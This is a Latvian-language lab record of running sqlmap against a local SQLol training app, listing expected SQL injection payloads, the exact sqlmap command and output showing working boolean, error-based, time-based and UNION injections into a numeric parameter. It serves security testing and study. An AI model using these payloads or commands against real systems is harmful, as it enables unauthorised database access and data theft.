=================================================================================
1. Īpašība: tiek no ievades lauka nodzēstas pēdiņas, ievadāmā vērtība ir skaitlis
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: ?inject_string=1 OR 1=1
3.2. error-based: ?inject_string=1asd
3.3. time-based: ?inject_string=1 or sleep(1)%23
3.4. union: ?inject_string=1 union select 1%23
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 17419480 nanosekundes
6. Palaistā komanda
sqlmap -u "http://localhost/MCIR/sqlol/select.php?sanitization_level=high&sanitization_type=keyword&sanitization_params=%27&query_results=all_rows&error_level=verbose&show_query=on&inject_string=1&location=where_int&submit=Inject%21" -p inject_string --risk=3 --level=5

7. Jautājumi, kurus uzdeva SQLMap:
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. GET parameters 'inject_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: inject_string (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sanitization_level=high&sanitization_type=keyword&sanitization_params='&query_results=all_rows&error_level=verbose&show_query=on&inject_string=1 AND 3884=3884&location=where_int&submit=Inject!

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: sanitization_level=high&sanitization_type=keyword&sanitization_params='&query_results=all_rows&error_level=verbose&show_query=on&inject_string=1 AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT (ELT(5803=5803,1))),0x7170717a71),5803)&location=where_int&submit=Inject!

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sanitization_level=high&sanitization_type=keyword&sanitization_params='&query_results=all_rows&error_level=verbose&show_query=on&inject_string=1 AND (SELECT 8237 FROM (SELECT(SLEEP(5)))Smwm)&location=where_int&submit=Inject!

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: sanitization_level=high&sanitization_type=keyword&sanitization_params='&query_results=all_rows&error_level=verbose&show_query=on&inject_string=1 UNION ALL SELECT CONCAT(0x71706a7671,0x635355574f677950446a514258654c6266506364566779414948744967464f75426a6d5276477954,0x7170717a71)-- -&location=where_int&submit=Inject!
---
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
